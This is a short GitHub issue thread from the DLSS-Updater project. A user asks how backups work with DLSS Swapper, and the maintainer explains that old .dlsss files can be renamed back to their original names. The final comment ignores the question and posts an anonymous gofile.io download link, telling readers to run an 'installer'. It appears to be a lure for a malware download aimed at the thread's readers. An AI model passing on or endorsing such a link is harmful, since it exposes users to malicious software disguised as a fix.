### ISSUE TITLE
Back up system with DLSS swapper

### ISSUE THREAD

**Issue by Kotoezhh** [Recol/DLSS-Updater#26]
Could anyone describe how exactly does it work? i couldnt find any info and didnt find myself.
Ty in advance

**Comment by Recol** [comment]
It does not support backups directly as of now, it is a soft reset system where the backed up files can be read by DLSS Swapper to use the same format, - this is **only** if it can detect it itself, which isn't guaranteed. In which case you can simply rename the old .dlsss files back to their original for (whatever file) is backed up.

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
